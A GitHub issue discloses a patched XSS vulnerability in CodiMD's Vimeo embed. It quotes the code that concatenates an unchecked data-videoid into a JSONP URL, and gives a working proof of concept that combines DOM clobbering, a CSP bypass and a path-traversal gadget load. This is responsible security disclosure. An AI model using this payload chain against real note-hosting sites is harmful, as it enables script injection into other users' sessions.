Skip to content

XSS Vulnerability in Embeding Vimeo Video Feature #1774

New issue
New issue
Closed
Closed
XSS Vulnerability in Embeding Vimeo Video Feature#1774
@splitline

Description

@splitline
splitline
opened on Sep 2, 2022

This issue has been reported to HackMD and has been patched on hackmd.io.

Root Cause

It doesn't check data-videoid attribute at all, and directly concat it into the JSONP URL. In this way we can load arbitrary file under https://vimeo.com as JavaScript, which might cause XSS.

codimd/public/js/extra.js

Lines 318 to 329 in e7a5ea8

view.find('div.vimeo.raw').removeClass('raw')
.click(function () {
imgPlayiframe(this, '//player.vimeo.com/video/')
})
.each((key, value) => {
jsonp(`//vimeo.com/api/v2/video/${$(value).attr('data-videoid')}.json`, function (data) {
const thumbnailSrc = data[0].thumbnail_large
const image = `<img src="${thumbnailSrc}" />`
$(value).prepend(image)
if (window.viewAjaxCallback) window.viewAjaxCallback()
})
})

PoC

Step 1. Create a note with content alert(document.domain);, and

Step 2.
Create a note with the following content:

<!-- DOM clobbering + CSP Byapss  -->
<img src="/<note-id-created-in-step-1>/download" id="_zxcvbnSettings">
<!-- load gadget  -->
<div class="vimeo raw" data-videoid="../../../blog/wp-includes/js/zxcvbn-async.js#"></div>

Step 3. View it and trigger the XSS!

Technical Detail (Chinese): https://blog.splitline.tw/hackmd-xss/

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions